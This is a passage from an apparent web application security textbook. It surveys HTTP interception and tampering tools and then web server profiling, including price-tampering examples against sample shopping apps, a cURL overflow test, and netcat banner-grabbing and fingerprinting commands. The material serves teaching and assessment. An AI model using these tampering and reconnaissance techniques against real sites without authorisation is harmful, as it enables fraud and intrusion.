attacked most frequently, including the Open Web Application Security Project (OWASP) Top 10, which lists the top ten most serious web application vulnerabilities based on a “broad consensus” within the security community. A more data-driven resource is the WhiteHat Website Security Statistics Report, which contains a wealth of data based on WhiteHat’s ongoing semi-automated web security assessment business. The value of this report is best summed up in WhiteHat’s own words: WhiteHat has been publishing the report, which highlights the top ten vulnerabilities, vertical market trends and new attack vectors, since 2006. The WhiteHat report presents a statistical picture of current website vulnerabilities, accompanied by WhiteHat expert analysis and recommendations. WhiteHat’s report is the only one in the industry to focus solely on unknown vulnerabilities in custom Web applications, code unique to an organization, within real-world websites. WhiteHat’s report classifies vulnerabilities according to the WASC Threat Classification taxonomy. Links to OWASP, WhiteHat, and WASC resources can be found in the “References & Further Reading” section at the end of this chapter. HOW ARE WEB APPS ATTACKED? Enough with the appetizers, on to the main course! As you might have gathered by this point in the chapter, the ability to see and manipulate both graphical and raw HTTP/S is an absolute must. No proper web security assessment is possible without this capability. Fortunately, there are numerous tools that enable this functionality, and nearly all of them are free. In the final section of this chapter, we’ll provide a brief overview of some of our favorites so you can work along with us on the examples presented throughout the rest of the book. Each of the tools described next can be obtained from the locations listed in the “References & Further Reading” section at the end of this chapter. A list of automated web application security scanners that implement more comprehensive and sophisticated functionality than the tools discussed here can be found in Chapter 10. The tools discussed in this chapter are basic utilities for manually monitoring and manipulating HTTP/S. We’ll address several categories of HTTP analysis and tampering tools in this section: the web browser, browser extensions, HTTP proxies, and command-line tools. We’ll start with the web browser, with the caveat that this is not necessarily indicative of our Chapter 1: Hacking Web Apps 101 13 preference in working with HTTP. Overall, we think browser extensions offer the best combination of functionality and ease of use when it comes to HTTP analysis, but depending on the situation, command-line tools may offer more easily scriptable functionality for the job. As with most hacking, attackers commonly leverage the best features of several tools to get the overall job done, so we’ve tried to be comprehensive in our coverage, while at the same time clearly indicating which tools are our favorites based on extensive testing in real-world scenarios. The Web Browser It doesn’t get much more basic than the browser itself, and that’s sometimes the only tool you need to perform elegant web app hacking. As we saw very early in this chapter, using the web application’s graphical interface itself can be used to launch simple but devastating attacks, such as SQL injection that effectively bypasses the login (see Figure 1-1 again). Of course, you can also tamper with the URI text in the address bar of your favorite browser and press the Send button. Figure 1-2 illustrates how easy it can be, showing how to elevate the account type from Silver to Platinum in Foundstone’s Hacme bank sample application. Figure 1-2 Using a basic web browser to attack Foundstone’s Hacme bank. A simple vertical escalation attack is highlighted with a circle. 14 Hacking Exposed Web Applications It couldn’t be that easy, could it? Browsers do have two basic drawbacks: one, they perform behind-the-scenes tampering of their own with URIs (for example, IE strips out dot-dot-slashes and later versions even block cross-site scripting), and two, you can’t mess with the contents of PUT requests from the browser address bar (sure, you could save the page locally, edit it, and resubmit, but who wants to go through that hassle a zillion times while analyzing a large app?). The easy solution to this problem is browser extension-based HTTP tampering tools, which we’ll discuss next. Browser Extensions Brower extensions are lightweight add-ons to popular web browsers that enable HTTP analysis and tampering from within the browser interface. They’re probably our favorite way to perform manual tampering with HTTP/S. Their main advantages include: • Integration with the browser Integration gives a more natural feel to the analysis, from the perspective of an actual user of the application. It also makes configuration easier; stand-alone HTTP proxies usually require separate configuration utilities that must be toggled on and off. • Transparency The extensions simply ride on top of the browser’s basic functionality, which allows them to handle any data seamlessly that the browser can digest. This is particularly important for HTTPS connections, which often require stand-alone proxies to rely on separate utilities. We’ll list the currently available browser extension tools next, starting with Internet Explorer (IE) extensions and then move on to Firefox. Internet Explorer Extensions Here are IE extensions for HTTP analysis and tampering, listed in order of our preference, with the most recommended first. TamperIE TamperIE is a Browser Helper Object (BHO) from Bayden Systems. It is really simple—its only two options are to tamper with GETs and/or POSTs. By default, TamperIE is set to tamper only with POSTs, so when you encounter a POST while browsing (such as a form submission or shopping cart order form), TamperIE automatically intercepts the submission and presents the screen shown in Figure 1-3. From this screen, all aspects of the HTTP request can be altered. The POST request can be viewed in “pretty” or “raw” format, either of which can be edited. Figure 1-3 shows a straightforward attack in which the price of an item is changed within the HTTP cookie before being submitted for purchase. This example was provided by Bayden Systems’ “sandbox” web purchasing application (see “References & Further Reading” at the end of this chapter for a link). If you think about it, TamperIE might be the only tool you really need for manual web app hacking. Its GET tampering feature bypasses any restrictions imposed by the Chapter 1: Hacking Web Apps 101 15 Figure 1-3 TamperIE intercepts a POST request and lets the attacker change the price of an order from $1,995 to $5. Who says web hacking doesn’t pay! browser, and the PUT feature allows you to tamper with data in the body of the HTTP request that is not accessible from the browser’s address bar (yeah, OK, you could save the page locally and resubmit, but that’s so old school!). We like a tool that does the fundamentals well, without need of a lot of bells, whistles, and extraneous features. IEWatch IEWatch is a simple but fully functioning HTTP-monitoring client that integrates into IE as an Explorer bar. When loaded to perform HTTP or HTML analysis, it takes up the lower portion of the browser window, but it’s not too restricting and it’s adjustable to suit tastes. IEWatch exposes all aspects of HTTP and HTTPS transactions on the fly. Everything, including headers, forms, cookies, and so on, is easily analyzed to the minutest detail simply by double-clicking the object in the output log. For example, double-clicking a cookie logged by IEWatch will pop up a new window displaying each parameter and value in the cookie. Very helpful! The only disappointment to this great tool is that it is “watch” only—it doesn’t permit tampering. IEWatch is shown in Figure 1-4 as it analyzes a series of HTTP requests/responses. IE Headers IE Headers by Jonas Blunck offers the same basic functionality of IEWatch, but it is somewhat less visually appealing. Like IEWatch, IE Headers is also an Explorer bar that sits at the bottom of the browser and displays the HTTP headers sent and received by IE as you surf the Web. It does not permit data tampering. 16 Hacking Exposed Web Applications Figure 1-4 IEWatch performing HTTP analysis on a popular site Firefox Extensions Here are Firefox extensions for HTTP analysis and tampering, listed in order of our preference, with the most recommended first. LiveHTTPHeaders This Firefox plug-in, by Daniel Savard and Nikolas Coukouma, dumps raw HTTP and HTTPS traffic into a separate sidebar within the browser interface. Optionally, it can open a separate window (when launched from the Tools menu). LiveHTTPHeaders also adds a “Headers” tab to the Tools | Page Info feature in Firefox. It’s our favorite browser extension for HTTP tampering. Firefox LiveHTTPHeaders displays the raw HTTP/S for each request/response. LiveHTTPHeaders also permits tampering via its Replay feature. By simply selecting the Chapter 1: Hacking Web Apps 101 17 recorded HTTP/S request you want to replay and pressing the Replay button (which is only available when LiveHTTPHeaders is launched from the Tools menu), the selected request is displayed in a separate window, in which the entire request is editable. Attackers can edit any portion of the request they want and then simply press Replay, and the new request is sent. Figure 1-5 shows LiveHTTPHeaders replaying a POST request in which the User-Agent header has been changed to a generic string. This trivial modification can sometimes be used to bypass web application authorization, as we’ll demonstrate in Chapter 5. TamperData TamperData is a Firefox extension written by Adam Judson that allows you to trace and modify HTTP and HTTPS requests, including headers and POST parameters. It can be loaded as a sidebar or as a separate window. The tamper feature can be toggled from either place. Once set to Tamper, Firefox will present a dialog box upon each request, offering to “tamper,” “submit,” or “abort” the request. By selecting Tamper, the user is presented with the screen shown in Figure 1-6. Every aspect of the HTTP/S request is available for manipulation within this screen. In the example shown in Figure 1-6, we’ve changed an HTTPS POST value to “admin,” another common trick for bypassing web application security that we’ll discuss in more detail in Chapter 5. Although they offer the same basic functionality, we like LiveHTTPHeaders slightly more than TamperData because the former presents a more “raw” editing interface. Of course, this is a purely personal preference; either tool behaved functionally the same in our testing. Figure 1-5 Firefox LiveHTTPHeaders permits tampering with HTTP data via its Replay feature. 18 Hacking Exposed Web Applications Figure 1-6 Using TamperData to modify a POST request, changing a value to “admin” Modify Headers Another Firefox extension for modifying HTTP/S requests is Modify Headers by Gareth Hunt. Modify Headers is better for persistent modification than it is for per-request manipulation. For example, if you wanted to persistently change your browser’s User-Agent string or filter out cookies, Modify Headers is more appropriate than TamperData, since you don’t have to wade through a zillion pop-ups and alter each request. The two tools could be used synergistically: TamperData could be used to determine what values to set through per-request experimentation, and Modify Headers can then be set to persistently send those values throughout a given session, thereby automating the “housekeeping” of an attack. HTTP Proxies HTTP proxies are stand-alone programs that intercept HTTP/S communications and enable the user to analyze or tamper with the data before submitting. They do this by running a local HTTP service and redirecting the local web client there (usually by setting the client’s proxy configuration to a high local TCP port like 8888). The local HTTP service, or proxy, acts as a “man-in-the-middle” and permits analysis and tampering with any HTTP sessions that pass through it. HTTP proxies are somewhat clunkier to use than browser extensions, mostly because they have to interrupt the natural flow of HTTP. This awkwardness is particularly visible Chapter 1: Hacking Web Apps 101 19 when it comes to HTTPS (especially with client certificates), which some proxies are not able to handle natively. Browser extensions don’t have to worry about this, as we saw earlier. On the plus side, HTTP proxies are capable of analyzing and tampering with nonbrowser HTTP clients, something that tools based on browser extensions obviously can’t do. On the whole, we prefer browser-based tools because they’re generally easier to use and put you closer to the natural flow of the application. Nevertheless, we’ll highlight the currently available HTTP proxy tools next, listed in order of our preference, with the most recommended first. Check out Bayden Systems’ IEToys, which includes a Proxy Toggle add-on that can be invaluable for switching configurations easily when using HTTP proxies. Paros Proxy Paros Proxy is a free tool suite that includes an HTTP proxy, web vulnerability scanner, and site crawling (aka spidering) modules. It is written in Java, so in order to run it, you must install the Java Runtime Engine (JRE) from (Sun also offers many developer kits that contain the JRE, but they contain additional components that are not strictly necessary to run Java programs like Paros Proxy.) Paros has been around for some time and is deservedly one of the most popular tools for web application security assessment available today. Our focus here is primarily on Paros’ HTTP Proxy, which is a decent analysis tool that handles HTTPS transparently and offers a straightforward “security pro” use model, with a simple “trap” request and/or response metaphor that permits easy tampering with either side of an HTTP transaction. Figure 1-7 shows Paros tampering with the (now infamous) “Cost” field in Bayden Systems’ sample shopping application. Paros is at or near the top of our list when it comes to HTTP proxies due to its simplicity and robust feature set, including HTTPS interception capability with client certificate support. Of course, the HTTPS interception throws annoying “validate this certificate” pop-ups necessitated by the injection of the proxy’s “man-in-the-middle” cert, but this is par for the course with HTTP proxy technology today. OWASP WebScarab There is probably no other tool that matches OWASP’s WebScarab’s diverse functionality. It includes an HTTP proxy, crawler/spider, session ID analysis, script interface for automation, fuzzer, encoder/decoder utility for all of the popular web formats (Base64, MD5, and so on), and a Web Services Description Language (WSDL) and SOAP parser, to name a few of its more useful modules. It is licensed under the GNU General Public License v2. Like Paros, WebScarab is written in Java and thus requires the JRE to be installed. WebScarab’s HTTP proxy has the expected functionality (including HTTPS interception, but also with certificate warnings like Paros). WebScarab does offer several 20 Hacking Exposed Web Applications Figure 1-7 Paros Proxy traps an HTTP POST request, permitting tampering with a hidden “Cost” field. bells and whistles like SSL client cert support, on-the-fly decoding of hex or URL-encoded parameters, built-in session ID analysis, and one-click “finish this session” efficiency enhancements. Figure 1-8 shows WebScarab tampering with the hidden “Cost” field cited throughout this chapter. WebScarab is comparable to Paros in terms of its basic proxying functionality, but it offers more features and provides a little more “under-the-hood” access for more technical users. We’d still recommend that novice users start with Paros due to its simplicity, however. ProxMon For those looking for a shiny red “easy” button for WebScarab, consider ProxMon, a free utility released by iSEC Partners in 2006 and available for both Unixbased and Windows platforms as a precompiled binary. It analyzes WebScarab’s Temporary or Save directories, examines all transaction logs, and reports securityrelevant events, including important variables in set cookies, sent cookies, query strings, and post parameters across sites, as well as performing vulnerability checks based on its included library. Some optional active tests ( o) actually connect to target hosts and perform actions such as attempting to upload files. ProxMon’s primary purpose is to automate the tedious aspects of web application penetration testing in order to decrease effort, improve consistency, and reduce errors. If you’re already using a tool like WebScarab, it may be worthwhile to see if ProxMon can assist your efforts. Chapter 1: Hacking Web Apps 101 21 Figure 1-8 OWASP WebScarab’s HTTP proxy offers on-the-fly decoding/encoding of parameters, as shown in this example using the hidden “Cost” field. Fiddler This handy tool is a free release from Eric Lawrence and Microsoft, and it’s the best nonJava freeware HTTP proxy we’ve seen. It is quite adept at manipulating HTTP and HTTPS requests. Fiddler runs only on Windows and requires Microsoft’s .NET Framework 2.0 or later to be installed. Fiddler’s interface is divided into three panes: on the left, you’ll see a list of sessions intercepted by Fiddler; the upper-right pane contains detailed information about the 22 Hacking Exposed Web Applications request; and the lower tracks data for the response. While browsing the Web as usual in an external browser, Fiddler records each request and response in the left pane (both are included on one line as a session). When clicking on a session, the right-hand panes display the request and response details. Fiddler automatically configures IE to use its local proxy, but other browsers like Firefox may have to be manually configured to localhost:8888. In order to tamper with requests and responses, you have to enable Fiddler’s “breakpoints” feature, which is accessed using the Automatic Breakpoints entry under the Rules menu. Breakpoints are roughly analogous to Paros’ “trap” and WebScarab’s “intercept” functionality. Breakpoints are disabled by default, and they can be set to occur automatically before each request or after each response. We typically set “before request,” which will then cause the browser to pause before each request, whereupon the last entry in the Fiddler session list will be visually highlighted in red. When selecting this session, a new bright red bar appears between the request and response panes on the right side. This bar has two buttons that control subsequent flow of the session: “break after response” or “run to completion.” Now you can tamper with any of the data in the request before pressing either of these buttons to submit the manipulated request. Figure 1-9 shows Fiddler tampering with our old friend, the “Cost” field in Bayden Systems’ “sandbox” online purchasing application. Once again, we’ve enacted an ad hoc price cut for the item we’ve purchased. Figure 1-9 Fiddler slashes prices by tampering with HTTP POST data. Here, again, we’ve dropped the price from $1,995 to $5. Chapter 1: Hacking Web Apps 101 23 Overall, we also like the general smartness of the Fiddler feature set, such as the ability to restrict the local proxy to outbound only (the default). Fiddler also includes scripting support for automatic flagging and editing of HTTP requests and responses; you can write .NET code to tweak requests and responses in the HTTP pipeline, and you may write and load your own custom inspector objects (using any .NET language) by simply dropping your compiled assembly .DLL into the \Fiddler\Inspectors folder and restarting Fiddler. If you want a Java-less HTTP/S proxy, Fiddler should be at the top of your list. Burp Intruder Burp Intruder is a Java-based HTTP proxy tool with numerous web application security testing features. A slower and less functional demo version is available for free as part of the Burp Suite. A stand-alone professional version is £99. Burp Intruder’s conceptual model is not the most intuitive for novice users, but if you’re willing to invest the effort to figure it out, it does offer some interesting capabilities. Its primary functionality is to iterate through several attacks based on a given request structure. The request structure essentially has to be gathered via manual analysis of the application. Once the request structure is configured within Burp Intruder, navigating to the Positions tab lets you determine at what point various attack payloads can be inserted. Then you have to go to the Payloads tab to configure the contents of each payload. Burp Intruder offers several packaged payloads, including overflow testing payloads that iterate through increasing blocks of characters and illegal unicode-encoded input. Once positions and payloads are set, Burp Intruder can be launched, and it ferociously starts iterating through each attack, inserting payloads at each configured position and logging the response. Figure 1-10 shows the results of overflow testing using Burp Intruder. Burp Intruder lends itself well to fuzz-testing (see Chapter 10) and denial-of-service testing using its Ignore Response mode, but it isn’t well suited for more exacting work where individual, specifically crafted insertions are required. Google Ratproxy Google’s announcement of the release of its first web security tool in July 2008 made waves in the security community. The utility was reportedly used internally at Google before its release, so many anticipated it would provide web security auditing capabilities at a level of sophistication and scale befitting the company that released it. Subsequently, ratproxy has become another solid addition to the tools mentioned previously. Like most of the other proxy tools discussed so far, it is designed for security professionals with a substantial understanding of web app security issues and the experience to use it effectively and understand its output. Ratproxy is a command-line tool that runs natively in Unix/Linux environments, including newer Mac OSes based on Unix. To run ratproxy under Windows, you’ll need to run it in a Unix/Linux emulation environment like Cygwin (the online ratproxy documentation has a link to good instructions on how to run it on Windows under Cygwin). 24 Hacking Exposed Web Applications Figure 1-10 Results from overflow testing using Burp Intruder. Note the transition from HTTP 404 to HTTP 414 “Too Long” responses, suggesting some internal limitation exists in this application. Once deployed, ratproxy runs like any of the other proxies discussed so far: start it (selecting the appropriate verbosity mode and testing invasiveness level), configure your browser to point toward the ratproxy listener (default is localhost:8080), and begin using the target site via your browser to exercise all functionality possible. Ratproxy will perform its testing and record its results to the user-defined log file. After that, the included script can be used to generate an HTML report from the resulting log file. Ratproxy is shown examining a web site in Figure 1-11. Ratproxy’s author does not recommend using a web crawler or similar tool through ratproxy; ratproxy is thus confined to manual testing only. Make sure to configure the Windows Firewall to enable ratproxy to function correctly (by default, access is blocked on later Windows versions). Also, you may need to clear your browser’s cache frequently to ensure the browser routes requests via ratproxy rather than simply pulling them from the local cache. Chapter 1: Hacking Web Apps 101 25 Figure 1-11 Google ratproxy deployed with Cygwin on Windows 7 examines a web site. Command-line Tools Here are a couple of our favorite command-line tools that are good to have around for scripting and iterative attacks. cURL cURL is a free, multiplatform command-line tool for manipulating HTTP and HTTPS. It’s particularly powerful when scripted to perform iterative analyses, as we’ll demonstrate in Chapters 5 and 6. Here’s a simple input overflow testing routine created in Perl and piggybacked onto cURL: $ curl https://website/login.php?user `perl –e 'print "a" x 500'` 26 Hacking Exposed Web Applications Netcat The “Swiss Army Knife” of network hacking, netcat is elegant for many tasks. As you might guess from its name, it most closely resembles the Unix cat utility for outputting file content. The critical difference is that netcat performs the same function for network connections: it dumps the raw input and output of network communications to the command line. You saw one simple example earlier in this chapter that demonstrated a simple HTTP request using netcat. Text file input can be input to netcat connections using the redirect character (<), as in nc vv server 80 < file.txt. We’ll cover some easy ways to script netcat on Unix/Linux platforms in Chapter 2. Although elegant, because it is simply a raw network tool, netcat requires a lot of manual effort when used for web application work. For example, if the target server uses HTTPS, a tool like SSLProxy, stunnel, or openssl is required to proxy that protocol in front of netcat (see “References & Further Reading” in this chapter for links to these utilities). As we’ve seen in this chapter, there are numerous tools that automatically handle basic HTTP/S housekeeping, which requires manual intervention when using netcat. Generally, we recommend using other tools discussed in this chapter for web app security testing. Older Tools HTTP hacking tools come and go and surge and wane in popularity. Some tools that we’ve enjoyed using in the past include Achilles, @Stake WebProxy, Form Scalpel, WASAT (Web Authentication Security Analysis Tool), and WebSleuth. Older versions of these tools may still be available in Internet archives, but generally, the more modern tools are superior, and we recommend consulting them first. SUMMARY In this chapter, we’ve taken the 50,000-foot aerial view of web application hacking tools and techniques. The rest of this book will zero in on the details of this methodology. Buckle your seatbelt, Dorothy, because Kansas is going bye-bye. Chapter 1: Hacking Web Apps 101 27 REFERENCES & FURTHER READING Reference Web Browsers Internet Explorer Firefox Standards and Specifications RFC Index Search Engine HTTP 1.0 HTTP 1.1 HTTP “Origin” Header HTML HTML5 Uniform Resource Identifier (URI) HTTPS SSL (Secure Sockets Layer) TLS (Transport Layer Security) eXtensible Markup Language (XML) WSDL UDDI SOAP WebGL Google Native Client (NaCl) Link RFC 1945 RFC 2616 28 Hacking Exposed Web Applications Reference General References OWASP Top 10 Microsoft ASP Microsoft ASP.NET Hypertext Preprocessor (PHP) Microsoft IIS Apache Java JavaScript IE Explorer Bar Open HTTP/S Proxies Client-side Crossdomain Security WhiteHat Website Security Statistic Report Web Application Security Consortium (WASC) User-Generated Content (UGC) Same Origin Policy IE Extensions TamperIE IEWatch IE Headers IE Developer Toolbar Search IE 5 Powertoys for WebDevs Link topten.html js_history.html default.asp?url=/library/ en-us/shellcc/platform/Shell/programmersguide/shell_adv/ bands.asp webdevaccess.mspx Chapter 1: Hacking Web Apps 101 29 Reference Firefox Extensions LiveHTTP Headers Tamper Data Modify Headers HTTP/S Proxy Tools Paros Proxy WebScarab ProxMon Fiddler HTTP Debugging Proxy Burp Intruder Google ratproxy Command-line Tools cURL Netcat SSL Proxy OpenSSL Stunnel Sample Applications Bayden Systems’ “sandbox” online shopping application Foundstone Hacme Bank and Hacme Books Link (under Resources/Free Tools) 2 ProFiling 32 Hacking Exposed Web Applications Profiling—the tactics used to research and pinpoint how web sites are structured and how their applications work—is a critical, but often overlooked, aspect of web hacking. The most effective attacks are informed by rigorous homework that illuminates as much about the inner workings of the application as possible, including all of the web pages, applications, and input/output command structures on the site. The diligence and rigor of the profiling process and the amount of time invested in it are often directly related to the quality of the security issues identified across the entire site, and it frequently differentiates “script-kiddie” assessments that find the “lowhanging fruit,” such as simple SQL injection or buffer overflow attacks, from a truly revealing penetration of an application’s core business logic. Many tools and techniques are used in web profiling, but after reading this chapter, you’ll be well on your way to becoming an expert. Our discussion of profiling is divided into two segments: • Infrastructure profiling • Application profiling We’ve selected this organizational structure because the mindset, approach, and outcome inherent to each type of profiling are somewhat different. Infrastructure profiling focuses on relatively invariant, “off-the-shelf” components of the web application (we use the term “off-the-shelf” loosely here to include all forms of commonly reused software, including freeware, open source, and commercial). Usually, vulnerabilities in these components are easy to identify and subsequently exploit. Application profiling, on the other hand, addresses the unique structure, logic, and features of an individual, highly customized web application. Application vulnerabilities may be subtle and may take substantial research to detect and exploit. Not surprisingly, our discussion of application profiling thus takes up the bulk of this chapter. We’ll conclude with a brief discussion of general countermeasures against common profiling tactics. INFRASTRUCTURE PROFILING Web applications require substantial infrastructure to support—web server hardware/ software, DNS entries, networking equipment, load balancers, and so on. Thus, the first step in any good web security assessment methodology is identification and analysis of the low-level infrastructure upon which the application lies. Footprinting and Scanning: Defining Scope The original Hacking Exposed introduced the concept of footprinting, or using various Internet-based research methods to determine the scope of the target application or organization. Numerous tools and techniques are traditionally used to perform this task, including: Chapter 2: Profiling 33 • Internet registrar research • DNS interrogation • General organizational research The original Hacking Exposed methodology also covered basic infrastructure reconnaissance techniques such as: • Server discovery (ping sweeps) • Network service identification (port scanning) Because most World Wide Web–based applications operate on the canonical ports TCP 80 for HTTP and/or TCP 443 for HTTPS/SSL/TLS, these techniques are usually not called for once the basic target URL has been determined. A more diligent attacker might port scan the target IP ranges using a list of common web server ports to find web apps running on unusual ports. See Chapter 8 for a discussion of common attacks and countermeasures against web-based administration ports. Don’t overlook port scanning—many web applications are compromised via inappropriate services running on web servers or other servers adjacent to web application servers in the DMZ. Rather than reiterating in detail these methodologies that are only partially relevant to web application assessment, we recommend that readers interested in a more expansive discussion consult the other editions of the Hacking Exposed series (see the “References & Further Reading” section at the end of this chapter for more information), and we’ll move on to aspects of infrastructure profiling that are more directly relevant to web applications. Basic Banner Grabbing The next step in low-level infrastructure profiling is generically known as banner grabbing. Banner grabbing is critical to the web hacker, as it typically identifies the make and model (version) of the web server software in play. The HTTP 1.1 specification (RFC 2616) defines the server response header field to communicate information about the server handling a request. Although the RFC encourages implementers to make this field a configurable option for security reasons, almost every current implementation populates this field with real data by default (although we’ll cover several exceptions to this rule momentarily). Banner grabbing can be performed in parallel with port scanning if the port scanner of choice supports it. 34 Hacking Exposed Web Applications Here is an example of banner grabbing using the popular netcat utility: D:\>nc -nvv 80 (UNKNOWN) [] 80 (?) open HEAD / HTTP/1.0 [Two carriage returns] HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Fri, 04 Jan 2002 23:55:58 GMT [etc.] Note the use of the HEAD method to retrieve the server banner. This is the most straightforward method for grabbing banners. There are several easier-to-use tools that we employ more frequently for manipulating HTTP, which we already enumerated in Chapter 1. We used netcat here to illustrate the raw input-output more clearly. Advanced HTTP Fingerprinting In the past, knowing the make and model of the web server was usually sufficient to submit to Google or Bugtraq and identify if there were any related exploits (we’ll discuss this process in more depth in Chapter 3). As security awareness has increased, however, new products and techniques have surfaced that now either block the server information from being displayed, or report back false information to throw attackers off. Alas, information security is a never-ending arms race, and more sophisticated banner grabbing techniques have emerged that can be used to determine what a web server is really running. We like to call the HTTP-specific version of banner grabbing fingerprinting the web server, since it no longer consists of simply looking at header values, but rather observing the overall behavior of each web server within a farm and how individual responses are unique among web servers. For instance, an IIS server will likely respond differently to an invalid HTTP request than an Apache web server. This is an excellent way to determine what web server make and model is actually running and why it’s important to learn the subtle differences among web servers. There are many ways to fingerprint web servers, so many in fact that fingerprinting is an art form in itself. We’ll discuss a few basic fingerprinting techniques next. Unexpected HTTP Methods One of the most significant ways web servers differ is in how they respond to different types of HTTP requests. And the more unusual the request, the more likely the web server software differs in how it responds to that request. In the following examples, we send a PUT request instead of the typical GET or HEAD, again using netcat. The PUT request has no data in it. Notice how even though we send the same invalid request, each server reacts differently. This allows us to accurately determine what web server is really being used, even though a system administrator may have changed the banner being returned by the server. The areas that differ are bolded in the examples shown here: Chapter 2: Profiling 35 Sun One Web Server $ nc 80 PUT/HTTP/1.0 Host: HTTP/1.1 401 Unauthorized Server: Sun-ONE-Web-Server/6.1 IIS 6.0 $ nc 80 PUT/HTTP/1.0 Host: HTTP/1.1 411 Length Required Server: Microsoft-IIS/6.0 Content-Type: text/html IIS 5.x $ nc 80 PUT/HTTP/1.0 Host: HTTP/1.1 403 Forbidden Server: Microsoft-IIS/5.1 Apache 2.0.x $ nc 80 PUT/HTTP/1.0 Host: HTTP/1.1 405 Method Not Allowed Server: Apache/2.0.54 Server Header Anomalies By looking closely at the HTTP headers within different servers’ responses, you can determine subtle differences. For instance, sometimes the headers will be ordered differently, or there will be additional headers from one server compared to another. These variations can indicate the make and model of the web server. For example, on Apache 2.x, the Date: header is on top and is right above the Server: header, as shown here in the bolded text: HTTP/1.1 200 OK Date: Mon, 22 Aug 2005 20:22:16 GMT Server: Apache/2.0.54 Last-Modified: Wed, 10 Aug 2005 04:05:47 GMT ETag: "20095-2de2-3fdf365353cc0" Accept-Ranges: bytes Content-Length: 11746 Cache-Control: max-age 86400 Expires: Tue, 23 Aug 2005 20:22:16 GMT Connection: close Content-Type: text/html; charset ISO-8859-1 On IIS 5.1, the Server: header is on top and is right above the Date: header—the opposite of Apache 2.0: HTTP/1.1 200 OK Server: Microsoft-IIS/5.1 Date: Mon, 22 Aug 2005 20:24:07 GMT X-Powered-By: ASP.NET 36 Hacking Exposed Web Applications Connection: Keep-Alive Content-Length: 6278 Content-Type: text/html Cache-control: private On Sun One, the Server: and Date: header ordering matches IIS 5.1, but notice that in the Content length: header “length” is not capitalized. The same applies to Content type:, but for IIS 5.1 these headers are capitalized: HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Mon, 22 Aug 2005 20:23:36 GMT Content-length: 2628 Content-type: text/html Last-modified: Tue, 01 Apr 2003 20:47:57 GMT Accept-ranges: bytes Connection: close On IIS 6.0, the Server: and Date: header ordering matches that of Apache 2.0, but a Connection: header appears above them: HTTP/1.1 200 OK Connection: close Date: Mon, 22 Aug 2005 20:39:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Cache-Control: private Content-Type: text/html; charset utf-8 Content-Length: 23756 The httprint Tool We’ve covered a number of techniques for fingerprinting HTTP servers. Rather than performing these techniques manually, we recommend the httprint tool from Net-Square (see the “References & Further Reading” at the end of this chapter for a link). Httprint performs most of these techniques (such as examining the HTTP header ordering) in order to skirt most obfuscation techniques. It also comes with a customizable database of web server signatures. Httprint is shown fingerprinting some web servers in Figure 2-1. SHODAN SHODAN is a computer search engine targeted at computers (routers, servers, etc.) that has interesting repercussions for information security. Available since December 2009, it combines an HTTP port scanner with a search engine index of the HTTP responses, making it trivial to find specific web servers. In this way, SHODAN magnifies the Chapter 2: Profiling 37 Figure 2-1 Httprint tool and results usefulness of simple banner grabbing by automating it and making it searchable. Large portions of the Internet have already been indexed by SHODAN, creating some interesting scenarios related to security. For example, you could easily identify: • All the IIS servers in the .gov domain • All the Apache servers in Switzerland • All IP addresses of systems possessing a known vulnerability in a specific web server platform Figure 2-2 illustrates the potential power of SHODAN. Hopefully, these examples also illustrate the utility of SHODAN and its potential repercussions. If there was ever a reason to avoid displaying banners that disclose sensitive information about web servers, this is it! 38 Hacking Exposed Web Applications Figure 2-2 SHODAN finds all IIS servers running Windows 2000 in the United States. Infrastructure Intermediaries One issue that can skew the outcome of profiling is the placement of intermediate infrastructure in front of the web application. This intermediate infrastructure can include load balancers, virtual server configurations, proxies, and web application firewalls. Next, we’ll discuss how these interlopers can derail the basic fingerprinting techniques we just discussed and how they can be detected. Virtual Servers One other thing to consider is virtual servers. Some web hosting companies attempt to spare hardware costs by running different web servers on multiple virtual IP addresses on the same machine. Be aware that port scan results indicating a large population of live servers at different IP addresses may actually be a single machine with multiple virtual IP addresses. Chapter 2: Profiling 39 Detecting Load Balancers Because load balancers are usually “invisible,” many attackers neglect to think about them when doing their assessments. But load balancers have the potential to drastically change the way you do your assessments. Load balancers are deployed to help make sure no single server is ever overloaded with requests. Load balancers do this by dividing web traffic among multiple servers. For instance, when you issue a request to a web site, the load balancer may defer your request to any one out of four servers. What this type of setup means to you is that while one attack may work on one server, it may not work the next time around if it’s sent to a different server, causing you much frustration and confusion. Although in theory all of the target’s servers should be replicated identically and no response from any of the servers should be different than any other, this just simply isn’t the case in the real world. And even though the application may be identical on all servers, its folder structure (this is very common), patch levels, and configurations may be different on each server where it’s deployed. For example, there may be a “test” folder left behind on one of the servers, but not on the others. This is why it’s important not to mess up any of your assessments by neglecting to identify load balancers. Here’s how you try to detect if a load balancer is running at your target’s site. Port Scan Surrounding IP Ranges One simple way to identify individual load-balanced servers is to first determine the IP address of the canonical server and then script requests to a range of IPs around that. We’ve seen this technique turn up several other nearly identical responses, probably all load-balanced, identical web servers. Infrequently, however, we encounter one or more servers in the farm that are different from the others, running an out-of-date software build or perhaps alternate services like SSH or FTP. It’s usually a good bet that these rogues have security misconfigurations of one kind or another, and they can be attacked individually via their IP address. TimeStamp Analysis One method of detecting load balancers is analyzing the response timestamps. Because many servers may not have their times synchronized, you can determine if there are multiple servers by issuing multiple requests within one second. By doing this, you can analyze the server date headers. And if your requests are deferred to multiple servers, there will likely be variations in the times reported back to you in the headers. You will need to do this multiple times in order to reduce the chances of false positives and to see a true pattern emerge. If you’re lucky, each of the servers will be offsync and you’ll be able to then deduct how many servers are actually being balanced. ETag and Last-Modified Differences By comparing the ETag and Last Modified values in the header responses for the same requested resource, you can determine if you’re getting different files from multiple servers. For example, here is the response for index .html multiple times: ETag: "20095-2de2-3fdf365353cc0" ETag: "6ac117-2c5e-3eb9ddfaa3a40" Last-Modified: Sun, 19 Dec 2004 20:30:25 GMT Last-Modified: Sun, 19 Dec 2004 20:31:12 GMT 40 Hacking Exposed Web Applications The difference in the Last Modified timestamps between these responses indicates that the servers did not have immediate replication and that the requested resource was replicated to another server about a minute apart. Load Balancer Cookies Some proxy servers and load balancers add their own cookie to the HTTP session so they can keep better state. These are fairly easy to find, so if you see an unusual cookie, you’ll want to conduct a Google search on it to determine its origin. For example, while browsing a web site, we noticed this cookie being passed to the server: AA002 1131030950-536877024/1132240551 Since the cookie does not give any obvious indications as to what application it belongs to, we did a quick Google search for AA002= and turned up multiple results of sites that use this cookie. On further analysis, we found that the cookie was a tracking cookie called “Avenue A.” 